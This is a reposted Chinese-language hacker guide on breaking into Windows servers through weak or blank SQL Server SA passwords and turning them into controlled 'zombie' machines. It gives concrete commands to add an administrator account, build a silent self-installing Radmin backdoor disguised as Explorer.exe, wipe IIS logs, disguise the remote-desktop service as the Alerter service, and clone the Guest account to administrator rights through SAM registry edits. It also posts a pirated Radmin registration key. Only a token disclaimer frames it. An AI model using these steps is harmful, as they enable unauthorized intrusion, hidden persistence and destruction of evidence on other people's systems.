駭客經驗談系列之入侵3389起源完整編(轉)

駭客經驗談系列之入侵3389起源完整編(轉)[@more@]【編輯提示】：本文僅供參考學習，嚴禁用於各類破壞行為！

這多是本人多年下來的經驗。

工具:WINNTAutoAttack自動攻擊器（掃漏洞）；SQLTOOLS（SA空口令聯結器）；RAMDIN影子3.0中文版（遠端控制程式）（RADMIN註冊碼:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隱藏3389服務及不讓管理發現自己程式）；CleanIISLog.exe（小榕的擦PP程式）；3389.exe（開3389埠服務的）；psu.exe（使用被禁止的Guest帳戶要用到的）；mstsc.exe（遠端桌面連線程式）。

一.掃到SA弱口令(自動攻擊器)

二.用SQLTOOLS連上去建一個使用者


net start telnet 開telnet服務

net user mint mint /add 新增使用者mint密碼為mint

net localgroup administrators mint /add 將帳號mint升級為管理員


三.上傳後門程式RAD.EXE(RADMIN服務端自解壓程式)

製作RAD.EXE過程:

1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe；

2、在本地設定服務端（一定要生成）；

設定密碼--&gt>設定連線埠(預設4489)--&gt>生成

3、匯出登錄檔HKEY_LOCAL_MACHINESYSTEMRadmin的鍵值為1.reg；

4、編寫一個批處理，並命名為u.bat；


@echo off
net stop r_server



5、寫第二個批處理，r.bat,內容為：


@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@del rad.exe
@del 1.reg
@del r.bat
@del u.bat


6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包；

7、將Rad.rar製作成自解壓檔案；

選擇Default.sfx的自釋放模組--&gt>高階自釋放選項

--&gt>常規

釋放路徑:%systemroot%system32

安裝程式:釋放後執行:r.bat 釋放前執行u.bat

--&gt>摸式

緘默模式:全部隱藏 覆蓋方式:覆蓋所有檔案

--&gt>確定--&gt>確定

生成完成。

四.用RADMIN客服端連線

上傳檔案到c:WINNT(XP是windows):

port.bat(如果是在XP下，這個要把裡面的WINNT改為Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上傳一個反彈後門RADMIN進入TELNET。

執行c:winnt3389.exe，重啟肉雞。

五.重啟後用遠端桌面遠端器連上去

這裡就有時會出現個問題。

使用3389登陸，發現登陸使用者已滿，不用怕，我們把他踢出去。

telnet對方ip，發現需要 NTLM 身份驗證。我們在自己的電腦裡建立一個帳號mint密碼為mint身份為管理員。

找到c:winntsystem32cmd.exe 建立一個快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。然後執行桌面上的cmd.exe的快捷方式。輸入帳號mint密碼mint，telnet對方ip，直接可以登陸對方電腦了。

使用命令：

c:query user (檢視對方目前終端登陸狀況。)

執行命令：

c:logoff 1(踢出去一個管理者)

再用c:query user檢查一便~~(這就是為什麼不馬上用1.bat了)

六.連上後..在cmd下執行

c:winntlog . 自己的IP .(擦PP)

c:winnet1.bat (刪除覆蓋檢視當前線上使用者檔案)

七.打SA空口令補丁

程式--&gt>Microsoft SQL Server--&gt>查詢分析器(有放大鏡的)

--&gt>Windowst身位驗證登陸

複製一下程式碼:SELMIS


if exists (select * from

dbo.sysobjects where id = object_id(N’[dbo].[xp_cmdshell]’) and

OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’

GO



按F5(執行)，關了退出SQL Server再用SQL Server身位驗證進一次，退出(這是為了不留下記錄)。

八.改3389埠和服務名稱

修改伺服器端的埠設定，登錄檔有2個地方需要修改。

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp]，PortNumber值，預設是3389，選擇10進位制，修改成所希望的埠，比如1314。

第二個地方：

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]　PortNumber值，預設是3389，選擇10進位制，修改成所希望的埠，比如1314。

要重啟系統才能用新埠連。(不急..改了他的服務名再重啟系統吧)

匯出3389服務的

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]

的鍵值為mm.reg檔案。編輯mm.reg檔案，替換TermService為Alerter(錯誤警告服務..別的服務也行) 。再把第十行的"Description"="(這裡是服務說明，改為你所換的服務說明，這裡改為通知所選使用者和計算機有關係統管理級警報。)"第十一行的"DisplayName"="(這裡是服務名稱，改為你所換的服務名稱，這裡改為Alerter)。儲存，再匯入登錄檔(這裡要先執行Services.msc(可在CMD下打這命令)服務管理器..把Alerter的服務先停止)。

再在CMD下


CD c:winntsystem32
copy termsrv.exe service.exe(這裡是複製termsrv.exe為Alerter服務檔名差不多的檔案)
CD C:winnt
sc \127.0.0.1 config Alerter binpath= c:winntsystem32service.exe(這裡是從新定向
Alerter服務檔案.服務名一定要區分大小寫A要大寫)


九.注消後(注消比直接關要好些)用Radmin重啟肉雞

十.使用被禁用的帳戶[Guest]登陸，刪除自己開始建的帳號

1.使用psu.exe展開登錄檔到

HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers

用法：[psu -p regedit -i pid]

Pid 的值為在工作列空白處點右鍵--&gt>工作管理員---&gt>程式中的winlogon.exe後面的數值就是PID數值。

如：psu –p regedit –i 157

將Guest克成管理員許可權，克成管理員許可權的方法:

找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesAdministrator的型別值。

在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers下找到這個型別值在複製數值名為F的數值數劇覆蓋相應的Guest的型別值(找的方法一樣)。

匯出Guest的配置(也就是匯出HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersGuest和他相應的型別值的資料)，然後刪除Guest的配置。

2.檢視計算機管理中帳戶列表，重新整理這時候會出現錯誤[找不到帳戶](跳過這步也行)。

3.將Guest的配置(二個REG檔案導進登錄檔)。

4.修改Guest帳戶密碼,命令列下禁用Guest帳戶[一定是命令列下]。


net user Guest **** [修改密碼]
net user Guest /active:yes
net user Guest /active:no[命令列下禁用Guest]


5.實驗被禁止的帳戶Guest是否可用。

6.用Guest登陸後刪除自己建的帳號。


net user mint /del


整個過程結束。


最後最好把RADMIN的服務也改了，多留個後門多條路，呵呵。整個過程全部結束，這機子就真正變成你的肉雞了。